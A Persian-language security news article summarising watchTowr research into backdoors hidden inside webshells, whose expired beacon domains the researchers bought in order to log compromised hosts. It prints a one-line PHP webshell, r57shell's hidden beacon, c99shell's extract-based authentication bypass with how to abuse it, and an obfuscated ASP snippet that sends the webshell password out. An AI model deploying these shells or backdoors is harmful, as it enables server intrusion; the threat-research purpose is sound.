Skip to content

ONHEXGROUP

اخبار دنیای امنیت سایبری

  • اخبار
    • آسیب پذیری امنیتی
    • آنالیز بدافزار
    • کنفرانس ،دوره ، وبینار ، لایو ، CTF
    • بازیگران تهدید
    • توسعه اکسپلویت
    • افشای اطلاعات
    • باگ بانتی
    • تیم آبی
    • تیم قرمز
    • امنیت وب
  • دوره های آموزشی
    • دوره رایگان مهندسی معکوس نرم افزار
  • لیست های ویژه
    • موتورهای جستجو برای امنیت سایبری
    • کاتالوگ KEV آژانس CISA
    • آسیب پذیری های وردپرس
      • آسیب پذیری پلاگین ها
      • آسیب پذیری های هسته
      • آسیب پذیری تم ها
    • محصولات خارج از پشتیبانی مایکروسافت
      • محصولات مایکروسافتی که در سال 2022 پشتیبانی نمیشن
      • محصولات مایکروسافتی که در سال 2023 پشتیبانی نمیشن
      • لیست محصولات مایکروسافتی که در سال 2024 پشتیبانی نمیشن
      • لیست محصولات مایکروسافتی که در سال 2025 پشتیبانی نمیشن
    • معرفی فیلم ها و سریالهای مرتبط با هک و امنیت
  • آموزش های ویدیویی
  • انتشارات
    • مجله
    • مقالات
    • پادکست
  • پروژه ها
    • ماشین آسیب پذیر
      • وردپرس آسیب پذیر
  • حمایت مالی ( Donate)
  • تماس با ما
 
  • Home
  • اخبار
  • بکدورهایی در دل بکدورها!
  • آسیب پذیری امنیتی
  • آنالیز بدافزار
  • اخبار
  • افشای اطلاعات
  • امنیت وب
  • بازیگران تهدید
  • تیم قرمز
  • مقالات

بکدورهایی در دل بکدورها!

On دی 22, 1403
seyyid
Share
زمان مطالعه: 10 دقیقه

تصور کنید میخواید به هزاران سیستم دسترسی پیدا کنید، اما نمیخواید وقت و انرژی خودتون رو صرف شناسایی و نفوذ به سیستمها کنید، یا اینکه واقعاً وارد کارهای پیچیده بشید.

بجای اون، شما از بکدورهای رها شده که در ابزارهای هک معمولی استفاده میشن، استفاده میکنید تا عملاً غنائم کارهای دیگران رو تصاحب کنید. این روش به شما همون دسترسی به سیستمهای نفوذ شده رو میده که فردی که برای شناسایی و نفوذ زحمت کشیده، بدست آورده. بدون هیچ تلاشی، با همون نتیجه، فقط به قیمت یک دامنه.

استفاده از غنائم هکرهای دیگه، چیز جدیدی نیست، مثلا همین اواخر مشخص شد که گروه هکری Secret Blizzard با دسترسی به زیرساخت هکرهای پاکستانی، از اهداف اونا سوء استفاده کرده بود.

بطور خلاصه، محققای watchTowr بکدورهایی رو که به زیرساختهای رهاشده یا دامنه‌های منقضی وابسته بودن و در داخل بکدورهای دیگه وجود داشتن رو تصاحب کردن و از اون زمان تاکنون شاهد سیل نتایج بودن. این فرآیند بهشون امکان داده تا میزبانهای هک شده ای که متصل میشدن رو ردیابی کنن و قدرت C2 این میزبانهای نفوذشده رو بدست بیارن.

پس از شناسایی بیش از 4000 بکدور فعال و منحصربه‌فرد (و این تعداد همچنان در حال افزایش است)، متوجه شدن که این تحقیق هرگز تموم نمیشه و بهترِ نتایج رو در وضعیت فعلیشون به اشتراک بذارن.

توجه: محققا عمداً نام میزبانهای نفوذشده رو مخفی کردن (در اکثر موارد hueheuhueh)، و انتشار این تحقیق هیچ سیستم دیگه ای رو در معرض خطر اضافی قرار نمیده.

در میان این 4000 بکدور فعال و منحصربه‌فرد، محققا سیستمهای جالبی مشاهده کردن:

  • چندین دولت مورد نفوذ قرار گرفته:
    • بنگلادش
    • چین
    • نیجریه
  • دانشگاهها و مؤسسات آموزشی هک شده در تایلند، چین، کره جنوبی و کشورهای دیگه
  • و البته، موارد زیاد دیگه (تاکنون بیش از 300 مگابایت لاگ برای بررسی ثبت کردن).

 

محققا اعلام کردن که همانطور که همیشه یادآوری شده، ما اولین کسانی نیستیم که برای تفریح هکرها رو ردیابی میکنیم و قطعاً آخرین هم نخواهیم بود. اما از ادامه سوء استفاده از چیزی که بطور واضح یک نوع آسیب‌پذیری بسیار دست‌کم گرفته‌شده است، زیرساختهای رهاشده و منقضی شده، لذت بردیم، که به ما دسترسی رایگان به هزاران سیستم رو با هزینه‌ای تنها معادل چند دامنه 20 دلاری داده.

همونطور که با فروپاشی گروههای جنایتکار و باندهای باج‌افزار مشاهده کردیم، مجرمان هم  انسان هستن و مانند هر کس دیگه ای ممکن است اشتباهات ساده‌ای مرتکب بشن.

هر کسی که با تاریخچه “صحنه هکری” آشنا باشه، این موضوع رو با ترکیبی از ترس و نوستالژی میبینه. هکرها از همون آغاز هک، یکدیگر رو هک کردن، هم برای سود و هم صرفاً برای تفریح. باور عمومی این است که هکرها، بطور کلی، در تأمین امنیت شبکه‌های کاریشون، چندان خوب نیستن.

خوشبختانه، گروه‌هایی مانند h0no، 2l8، zf0 و ~el8 این بازیها رو مستندسازی کردن تا برای سالهای آینده آرشیو و مطالعه بشن.

 

 

وب شل ها:

برای سفری کوتاه به تاریخ، میخوایم کمی پیش‌زمینه ارائه بدیم. بنابراین بیایید در مورد وب‌شلها صحبت کنیم.

وب‌شل‌ها، در اصل، قطعاتی از کد هستن که بعنوان بکدور روی وب‌سرورها پس از اکسپلویت موفقیت‌آمیز مستقر میشن تا فعالیتهای post-exploitation معمول رو ممکن سازن.

این مفهوم نسبتاً ساده است، و هدف این پست ارائه یک دوره ساده علوم کامپیوتر نیست. وب‌شل‌ها در قالب‌های مختلفی ظاهر میشن:

  • شِل‌های ساده و پایه – مانند قطعه کدی که فقط یک دستور رو اجرا میکنه، مثل این نمونه کلاسیک:

 

PHP
1
<?php system($_GET['exec']); ?>

 

  • شِل‌های پیشرفته با تمام امکانات و ویژگیها
    • c99shell
    • r57shell
    • China Chopper (توسط گروه‌های APT مستقر در چین مورد استفاده قرار گرفته)
    • و هزاران نمونه دیگه

 

c99shell و r57shell احتمالاً برای بسیاری یادآور خاطراتی خواهند بود، چون این وب‌شلهای معروف و پرکاربرد توسط هر اسکریپت‌کیدی استفاده میشدن تا ببینن چقدر میتونن ماجراجویی‌های اینترنتی خودشون رو پیش ببرن (البته در آزمایشگاه خونگیشون).

در زیر تصاویری از این وب شلهارو مشاهده می کنید ( تصاویر از اینترنت جمع آوری شدن و اهداف این تحقیق نیستن).

 

وب شل c99shell
وب شل r57shell
وب شل r57shell

همونطور که می‌بینید، این وب‌شلها همه چیزهایی رو که یک مهاجم امروزی ممکن است نیاز داشته باشه، در اختیار دارن، از جمله:

  • قابلیتهای اجرای دستور
  • مدیریت فایل (حذف، تغییر، آپلود، انتقال، تغییر نام و …)
  • قابلیت‌های اجرای کد
  • قابلیت حذف خودکار
  • استقرار بکدور (مانند connect-back، bindshell و …)
  • توانایی حمله BruteForce به FTP
  • کلاینتهای SQL

 

به معنای واقعی کلمه، هر نیازی که داشته باشید، این وب‌شلها میتونن اونارو برآورده کنن. اونا در اصل نسخه‌های بهبود‌یافته هر ابزار مدیریت از راه دوری هستن که در سال 2024 استفاده میکنید (اما مبتنی بر HTTP و با نمایش ASCII بهتر).

اونچه کمتر شناخته شده، این است که این وب‌شلها اغلب خودشون دارای بکدوری بودن تا به هکرها اجازه بدن، سایر هکرها رو هک کنن.

برای مثال در نسخه ی بدون تغییر r57shell، میتونید کدهای زیر رو مشاهده کنید:

 

PHP
1
2
3
4
5
if (!in_array($addr[0], $serv)) {
@print "<img src=\"http://rst.void.ru/r57shell_version/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
@readfile ("http://rst.void.ru/r57shell_version/version.php?version=".$current_version."");}}  
echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(2).'<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";

 

این کد یک تگ HTML از نوع <img> ایجاد میکنه با سایز صفر که فایلی رو از دامنه rst.void.ru (دامنه‌ای متعلق به سازندگان r57shell) دریافت میکنه تا به ظاهر نسخه فعلی شل مورد استفاده رو به نگه‌دارندگان اسکریپت ارسال کنه. به نظر بی‌خطر میرسه، درسته؟

اما در واقعیت، این کار مکان وب‌شل تازه استقرار‌یافته شما رو از طریق هدر HTTP Referrer به مالکین rst.void.ru فاش میکنه. بنابراین، پس از ساعتها تلاش برای هک هدف خودتون، شما به سادگی وب‌شل تازه‌کسب‌شده خودتون رو به شخصی باهوش‌تر از خودتون تحویل دادید.

بسیاری از وب‌شل‌ها دارای حفاظت با رمز عبور هستن که به مهاجم اجازه میده دسترسی رو فقط به خودشون محدود کنن. اما جای تعجب نیست، یکی از ویژگیهای رایج این بکدورها، قابلیتی است که به نویسنده اصلی وب‌شل (علاوه بر مهاجم فعلی) اجازه میده به هر سیستمی که وب‌شل روی اون اجرا میشه دسترسی پیدا کنه، با چیزی که عملاً به عنوان یک “کلید اصلی” عمل میکنه.

یک مثال خوب از این موضوع، درب‌پشتی c99shell است که قبلاً به اون اشاره کردیم. اگرچه این موضوع جدید یا نوآورانه نیست و سالها مورد بحث بوده، ما اینجا اونو برای ارائه پیش‌زمینه توضیح میدیم تا تصویری واضحتر ارائه بدیم.

 

PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$login = ""; //login
$pass = ""; //password
$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
 
...
 
@extract($_REQUEST["c99shcook"]);
 
...
 
if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
{
...
  header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\"");
  header("HTTP/1.0 401 Unauthorized");
  exit($accessdeniedmess);
}
}

 

در نگاه اول، این موضوع کاملاً ساده به نظر میرسه. نام کاربری و رمز عبور بصورت ثابت در بالای کد (با هدف سفارشی‌سازی توسط مهاجم قبل از استقرار وب‌شل) در متغیرهای $login و $pass قرار داده میشن.

در ادامه، یک مقایسه معمول با مقادیر PHP_AUTH_USER و PHP_AUTH_PW انجام میشه تا فرآیند احراز هویت بررسی بشه و در صورتی که مطابقت نداشته باشه، لاگین رخ نمیده. کاملاً عادی به نظر میرسه، درسته؟

اما آن تابع بی‌ضرر @extract چی میشه؟ خب، طبق مستندات سایت php.net، این تابع برای استفاده روی داده‌های غیرقابل‌اعتماد “ایمن” نیست.

 

دور زدن احراز هویت در وب شل

 

تابع extract طراحی شده تا ورودی رو بصورت جفت‌های کلید/مقدار دریافت کنه و بعدش از اونا برای بازنویسی متغیرها در اسکوپ فعلی استفاده کنه.

این بدان معناست که یک مجرم که مجرمان دیگه رو هدف قرار میده، میتونه به سادگی یک پارامتر درخواست c99shcook (بصورت GET یا POST) ارسال کنه که شامل متغیری با نام md5_pass باشه که مقدار اون به رمز عبور دلخواه خودش تنظیم شده و login به نام کاربری دلخواه تنظیم شده باشه. این کار متغیرهای ثابت احراز هویت رو بازنویسی میکنه و به مهاجم اجازه میده فرآیند احراز هویت رو پشت سر بذاره.

محققا با مشاهده ی این موارد، اومدن یک تحقیق جدید رو راه اندازی کردن با این هدف که آیا میتونن به این وب شلها دسترسی پیدا کنن.

محققا با هزینه ی 20 دلاری، تونستن 40 دامنه از این دامنه ها که در وب شلها قرار گرفته بودن رو خریداری کنن و زیرساخت خودشون رو راه اندازی کردن. در زیر نمونه هایی رو مشاهده میکنید:

 

نام وب شل دامنه
~mysterious who knows~ 6634596.com
marion001.php aljazeera7.com
~mysterious who knows~ alturks.com
~mysterious who knows~ caspian-pirates.org
EgY_SpIdEr ShElL V2 csthis.com
~mysterious who knows~ dcvi.net
NetworkFileManagerPHP drakdandy.net
Shell [ci] . Biz emp3ror.com
PHPJackal flyphoto.us
Kodlama guerrilladns.com
Predator h0ld-up.info
dhie-Q fx29sh v1 06.2008 h4cks.in
Nix remote web shell hackru.info
iMHaBiRLiGi imhabirligi.com
iMHaBiRLiGi nettekiadres.com
Ajax/PHP Command Shell ironwarez.info
ASP一句话客户端< jbl86.com
SyRiAn Sh3ll V7 library-ar.com
RedHat Hacker ll4best.com
r57shell localshell.net
Locus7Shell Modified by #!physx^ locus7s.com
星外-华众-新网-虚拟主机提权专用Webshell love-1-love.com
解包unpack.vbs lpl38.com
传说中的草泥马4.0.asp odayexp.com
Locus7s Modified c100 Shell precision-gaming.com
c99 rootshell-security.net
SimAttacker shellci.biz
c99_w4cking templatez.org
~mysterious who knows~ w2img.com
r57gentr dQ99Sh waterski21.com
get.php yywjw.com

 

با گواهی‌های wildcard TLS که بصورت خودکاری روی سرور وب Apache پیکربندی شدن، محققا دامنه های خریداری شده رو به سرور لاگ متصل کردن. این سرور عملا هیچ کاری انجام نمیده، درخواستهای ورودی رو لاگ و با کد 404 پاسخ میده. با این کار کلی درخواست گرفتن که در ادامه موارد جالب رو ارائه کردن.

 

سلام کره شمالی!

خب، اولین چیزی که محققا مشاهده کردن این بود که کسی در حال تقلید از گروه لازاروس (Lazarus)، معروف به APT37 یا همون کره شمالی بود. با توجه به اهداف موردنظر، بعید به نظر میرسه که محققا تونسته باشن گروه لازاروس رو هنگام فعالیت گیر بندازن، اما احتمالاً شاهد مهاجمینی بودن که ابزارهای سطح APT استفاده‌شده توسط لازاروس رو برای اهداف خودشون تغییر کاربری دادن.

اگر فروشندگان SSLVPN میتونن Path Traversal رو پیچیده در نظر بگیرن، پس یک وب‌شل هم معیار لازم برای توصیف بعنوان ابزار سطح APT رو داره.

به درخواستهای ورودی زیر نگاهی بندازید:

 

1
2
3
img2.w2img.com/midia_img/0f000cbW0BuDik7If87T3s.gif 202.146.[redacted] 485 "http://www.[redacted].com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
img2.w2img.com/midia_img/0f000cbW0BuDik7If87T3s.gif 35.206.[redacted] - 404 466 "http://[redacted].cn/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
img2.w2img.com/midia_img/0f000cegVDnfw03Y33y936.gif 103.170.[redacted] - 404 466 "http://www.[redacted].net/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0"

 

محققا هزاران درخواست مشابه این رو مشاهده کردن که یک تصویر gif رو از سرور لاگ‌گیریشون دریافت میکرده. اما این درخواست‌ها چه چیزی رو نشون میدن؟

خب، محققا تونستن نمونه‌ای از بکدور تولیدکننده این درخواستها رو پیدا کنن. به نظر میرسه این نسخه‌ای از بکدوری است که لازاروس در سال 2020 از اون استفاده کرده بود.

اگه نگاهی دقیقتر به بکدور بندازیم و مقداری از حالت مبهم خارجش کنیم، میتونیم URL مربوط به beaconing رو ببینیم که بعنوان یک تصویر gif از سرور لاگ گیری محققا درخواست میشه: (در زمینه امنیت سایبری، Beaconing به فرایندی اشاره داره که در اون یک بدافزار، بکدور یا RAT بطور منظم با سرور C2 ارتباط برقرار میکنه تا فعال بودن خودش رو اطلاع بده، دستوری رو برای اجرا بگیره، اطلاعاتی رو بفرسته و …)

 

1
.menu{background:url(http://img2.w2img.com/midia_img/0f000cegVDnfw03Y33y936.gif);}

 

این یک خط CSS است که مشخص میکنه استایل «menu» باید یک تصویر پس‌زمینه رو از URL مشخص‌شده لوود کنه. هنگام لوود صفحه، مرورگر وب تلاش میکنه فایل gif مشخص‌ شده رو از سرور w2img.com دریافت کنه.

ادمین های دقیق (یعنی ما!) با دقت لاگها رو مشاهده میکنن و این درخواست رو تشخیص میدن. در نهایت، این فرآیند باعث میشه که متوجه بشیم وب‌شل به درستی مستقر و دسترسی به اون انجام شده و آدرس URL رو در Referrer نشت میده.

توجه: افشای تنها دامنه در بخش Referrerها یک تغییر نسبتاً جدید در مرورگرهاست. در واقع، مهاجمان با استفاده از مرورگرهای قدیمی‌تر، URL کامل وب‌شل رو ارسال میکردن.

محققا بیش از ۳۹۰۰ دامنه‌ی آلوده‌ی منحصربه‌فرد رو تنها از طریق همین بکدور مشاهده کردن که نشون میده، این یک ابزار بسیار پرکاربرد است.

 

سازمانهای دولتی:

محققا با بررسی نتایج مربوط به دامنه‌های ارزشمند در بخش Referrerها، موارد زیر رو مشاهده کردن:

 

1
2
3
4
5
host# grep "\\.gov" referrers | sort -u
http://www.[redacted].gov.cn/
https://fhc.gov.ng/
http://[redacted].court.gov.cn
http://[redacted].gov.bd

 

fhc.gov.ng متعلق به دادگاه عالی فدرال نیجریه است.

همونطور که از لاگ‌های زیر مشاهده میکنید، این ارتباط از طریق ۴ بکدور مختلف انجام شده. بنابراین، ۴ وب‌شل متفاوت مسئول جمع‌آوری این اطلاعات بودن (که با ۴ دامنه مختلفی که درخواستها به اونا ارسال شدن، نشون داده شده).

 

1
2
3
4
[[redacted]  0000] http://img2.w2img.com:80/midia_img/0f000cegVDnfw03Y33y936.gif 175.176.[redacted] - 404 522 'http://www.[redacted].gov.cn/' 'Mozilla/5.0 (iPhone; CPU iPhone OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Mobile/15E148 Safari/604.1'
[[redacted]  0000] http://www.nettekiadres.com:443/imhabirligi.jpg 58.97.[redacted] - 404 3108 'https://fhc.gov.ng/' 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36'
[[redacted]  0000] h0ld-up.info:80/index.html 103.111.[redacted] - 200 342 "http://[redacted].gov.bd/[redacted].php" "Opera/10.61 (Linux i686; U; en-US) Presto/6.1.88 Version/2.2"
[[redacted]  0000] http://www.lpl38.com:443/post/http:/[redacted].court.gov.cn 117.136.[redacted] - 404 867 '-' 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36 EdgA/117.0.2045.53'

 

سیسکوی چینی:

محققا بین یافته های برجسته خودشون، با مورد زیر روبرو شدن:

 

1
img2.w2img.com:80/midia_img/0f000cegVDnfw03Y33y936.gif 110.66.[redacted] - 404 522 "http://www.ciscosoft.com.cn/[redacted].asp"

 

نکته جالبش ciscosoft.com.cn هستش. با بررسی که کردن متوجه شدن که این دامنه هیچ ارتباطی با غول نرم‌افزاری آمریکایی، سیسکو، نداره.

 

 

نوع دیگه بکدورها:

محققا با بررسی داده‌ها، یک نوع دیگه ای از بکدورهارو مشاهده کردن که بجای لوود تصویر و …، اطلاعاتی رو به سرور مهاجم ارسال میکرد. بطور خاص، محققا عملکردهایی رو مشاهده کردن که اطلاعات خاصی رو از طریق پارامترها به سرور لاگ‌گیری برمیگردوند.

برای مثال، مورد زیر (نمونه های مشابه این زیاد بوده):

 

1
www.odayexp.com:80/sx/key.asp?url=http%3A%2F%2F[redacted]%2Frequest%2FCelebByConsortiaDayRiches%2Easp&p=[redacted] 43.230.[redacted] - 404 523 "<http://220.167>.[redacted]:89/[redacted].asp" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36 Core/1.116.454.400 QQBrowser/13.2.6135.400"

 

این موضوع بلافاصله توجه محققا رو جلب کرده، چون نه تنها URL مربوط به وب‌شل رو ارائه میداده، بلکه یک پارامتر مرموز به نام p رو هم ارسال میکرده.

برای حل شدن این قضیه ابتدا بیایید نگاهی به URL موجود در referrer بندازیم.

این بار هم با یک وب‌شل روبه‌رو هستیم، اما این بار همراه با یک رمز عبور:

 

 

برای اینکه بدونیم، P به چی اشاره میکنه باید کد وب شل رو بررسی کنیم. این وب شل در ASP توسعه داده شده و در زیر کدهای مربوط به این قسمت رو مشاهده میکنید:

 

ASP
1
<img src='ht"&"tp://%77%77%77.od"&"ay"&"exp.%63%6F%6D/s"&"x/ke"&"y.asp"&"?url="&server.URLEncode("ht"&"tp://"&request.ServerVariables("HT"&"TP_HO"&"ST")&request.ServerVariables("UR"&"L"))&"&p="&UserPass&"' />

 

همونطور که مشاهده میکنید، کد مقداری مبهم هستش، اگه از حالت مبهم خارج کنیم:

 

ASP
1
2
3
<img src='<http://www.odayexp.com/sx/key.asp?url=>" & \\
server.URLEncode("http://" & request.ServerVariables("HTTP_HOST") & request.ServerVariables("URL")) & \\
"&p="&UserPass&"' />

 

این کد بازم یک تصویر رو جاسازی میکنه که از سرور لاگ‌گیری محققا در www.odayexp.com دریافت میشه. میتونیم ببینیم که پارامتر p چطوری ساخته شده. این صرفاً متغیر UserPass است. تعجبی نداره که این همون رمز عبوری است که برای ورود به وب‌شل نیاز هستش.

بنابراین اگه همه چیز رو کنار هم بذاریم: مهاجم تلاش کرده تا نصب وب‌شل خودش رو از طریق پسورد ایمن کنه، اما وب‌شل تا حدی بکدور داره که رمز عبور رو (بصورت واضح!) به یک سرور لاگ‌گیری، یعنی odayexp، ارسال میکنه که اکنون متعلق به تیم watchTowr است.

این مهاجم حداقل برای تلاشش در ایمن‌سازی وب‌شل، نیمی از امتیاز رو میگیره. اما ارسال رمز عبور به محققا بصورت متن ساده؟ قطعاً در فهرست «بهترین روش‌ها» جایی نداره.

یک نکته جالب دیگه این است که اگه به لاگها برگردیم، میتونیم ببینیم که مهاجم ظاهراً در حال تغییر و بازی با این عملکرد بوده، اما همچنان داده‌ها رو به سیستمی ارسال میکنه که تحت کنترل خودش نیست؟

 

1
2
3
4
5
www.odayexp.com:80/sx/key.asp?url=”server.urlencode
www.odayexp.com:80/sx/key.asp?url=http://192.168.66.134
www.odayexp.com:80/sx/key.asp?url=http://192.168.66.140/fk.asp
www.odayexp.com:80/sx/key.asp?url=http://localhost/test/fuccck.asp
www.odayexp.com:80/sx/key.asp?url=http://localhost/test/fuccck.asp&p=admin

 

نتیجه گیری:

محققا گفتن، در حالیکه امیدواریم این مقاله برای بسیاری از خوانندگان (و خود ما) سفری به نوستالژی‌های گذشته بوده باشه، نظر ما این است که با افزایش سن اینترنت و با درک واقعی تأثیرات زیرساخت‌های رهاشده و منقضی‌شده، احتمالاً شاهد ادامه مشکلات مشابه خواهیم بود.

قبلاً شاهد یک دامنه منقضی‌شده بودیم که بعنوان سرور WHOIS برای یک دامنه سطح‌بالای جهانی استفاده میشد. امروز، دامنه‌هایی هستن که در بکدورها بکار میرن. قدم بعدی چیه؟ زیرساختهای بروزرسانی نرم‌افزار و زیرساختهای ابری مقیاس‌پذیری خودکار برای دستگاه‌های SSLVPN؟ این ممکن است به‌ نظر دیوانگی باشه.

ما دوست داریم نیمه مثبت ماجرا رو ببینیم (در واقع این یک دروغ است، اما تلاش می‌کنیم)، تا حدی امیدوارکننده است که ببینیم مهاجمان هم همون اشتباهات مدافعان رو مرتکب میشن. براحتی میشه تصور کرد که مهاجمان هرگز اشتباه نمی‌کنن، اما در این تحقیق شواهدی برعکس این موضوع رو دیدیم، سرورهایی با وب‌شل‌های باز، دامنه‌های منقضی‌شده، و استفاده از نرم‌افزاری که بکدوری شدن.

محققا اعلام کردن که وب‌شل‌هایی که مشاهده کردن عمدتاً به سمت اهداف چینی گرایش داشتن (احتمالاً به داده هاشون هم مرتبط میشه)، اما ما تمایلی به نتیجه‌گیری بر اساس آدرسهای IP منبع نداریم (با توجه به سهولت پروکسی‌سازی). با این حال، میشه گرایش قوی از فضای آدرس IP هنگ‌کنگ و چین رو بعنوان منبع ترافیک مهاجمان مشاهده کنیم.

محققا تا به حال بیش از ۴۰۰۰ سیستم هک شده (که سه یا چهار مورد از اونا سیستمهای دولتی هستن) رو شناسایی کردن. این تعداد همچنان رو به افزایش است، همونطور که انتظار میره.

محققا نگرانی هایی هم در خصوص یافته های خودشون داشتن، اگه این محققا هم این دامنه‌ها رو همانند مالکان قبلی رها بکنن ، مرتکب همون بی‌احتیاطی در مدیریت زیرساخت میشن. بنابراین برای حل این مشکل، بنیاد Shadowserver پا پیش گذاشته و این دامنه هارو در لیست دامنه های غیرفعال قرار داده.

 

 

منبع

 

 

اشتراک در شبکه های اجتماعی :

Facebook
Twitter
Pinterest
LinkedIn
In آسیب پذیری امنیتی آنالیز بدافزار اخبار افشای اطلاعات امنیت وب بازیگران تهدید تیم قرمز مقالاتIn backdoor , webshell , بکدور , وب شل

راهبری نوشته

نقض Gravy Analytics و مشکلات حریم خصوصی و امنیت ملی
وردپرس آسیب پذیر نسخه ی دسامبر 2024

دیدگاهتان را بنویسید لغو پاسخ

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دسته‌ها

  • Osint
  • آسیب پذیری امنیتی
  • آموزش های ویدیویی
  • آنالیز بدافزار
  • اخبار
  • افشای اطلاعات
  • امنیت وب
  • انتشارات
  • اینترنت اشیاء
  • بازیگران تهدید
  • باگ بانتی
  • پادکست
  • پروژه ها
  • توسعه اکسپلویت
  • تیم آبی
  • تیم قرمز
  • دوره های آموزشی
  • فازینگ
  • کنفرانس ،دوره ، وبینار ، لایو ، CTF
  • لیست های ویژه
  • ماشین آسیب پذیر
  • مجله
  • مقالات
  • مهندسی معکوس نرم افزار

بایگانی‌ها

  • می 2025
  • آوریل 2025
  • مارس 2025
  • فوریه 2025
  • ژانویه 2025
  • دسامبر 2024
  • نوامبر 2024
  • اکتبر 2024
  • سپتامبر 2024
  • آگوست 2024
  • جولای 2024
  • ژوئن 2024
  • می 2024
  • آوریل 2024
  • مارس 2024
  • فوریه 2024
  • ژانویه 2024
  • دسامبر 2023
  • نوامبر 2023
  • اکتبر 2023
  • سپتامبر 2023
  • آگوست 2023
  • جولای 2023
  • ژوئن 2023
  • می 2023
  • آوریل 2023
  • مارس 2023
  • فوریه 2023
  • ژانویه 2023
  • دسامبر 2022

پست های مرتبط

  • آسیب پذیری امنیتی
  • اخبار
  • بازیگران تهدید
  • مقالات
seyyid
On اسفند 24, 1401فروردین 28, 1402

بررسی Patch Tuesday مایکروسافت برای مارس 2023 (اسفند 1401)

  • آسیب پذیری امنیتی
  • اخبار
  • بازیگران تهدید
  • باگ بانتی
  • توسعه اکسپلویت
  • تیم قرمز
  • مقالات
seyyid
On بهمن 20, 1403بهمن 20, 1403

تغییر مدل کسب و کار در صنعت امنیت سایبری تهاجمی

  • آسیب پذیری امنیتی
  • اخبار
seyyid
On بهمن 2, 1401فروردین 28, 1402

اصلاح آسیب پذیری با شدت بالا در محصولات سیسکو

  • آنالیز بدافزار
  • اخبار
  • بازیگران تهدید
  • تیم آبی
seyyid
On شهریور 3, 1402شهریور 4, 1402

آیا پایان عصر باج افزارها رسیده ؟!

درباره ما

بعد از چندین سال فعالیت تو حوزه امنیت سایبری و تولید محتوا در شبکه های اجتماعی ، بالاخره تصمیم گرفتیم تا یه سایت راه اندازی کنیم و مطالب رو ساده تر ، در یک محیط منسجم و طبقه بندی شده به دست مخاطب برسونیم. امیدوارم که قدمی در راستای رشد امنیت سایبری کشورمون برداشته باشیم.

تگ ها

0day APT command injection Deserialization of Untrusted Data Directory Traversal FBI Fortinet Heap buffer overflow integer overflow kali LockBit Memory Corruption nuclei Off By One Security out-of-bounds write Out of bounds read Patch Tuesday PWN2OWN Stack Buffer overflow type confusion use after free vulnerable wordpress XSS ZDI vulnerability آموزش اکسپلویت نویسی ارز دیجیتال اندروید اپل اکسپلویت باج افزار تلگرام زیرودی سیسکو فارنزیک فورتی نت فیشینگ لاک بیت مایکروسافت هوش مصنوعی وردپرس وردپرس آسیب پذیر ویندوز پلاگین کروم گوگل

شبکه های اجتماعی

    • Instagram
    • Telegram
    • Twitter
    • GitHub
    • YouTube
    • LinkedIn
      کپی مطالب با ذکر منبع بلامانع است | 1401-1404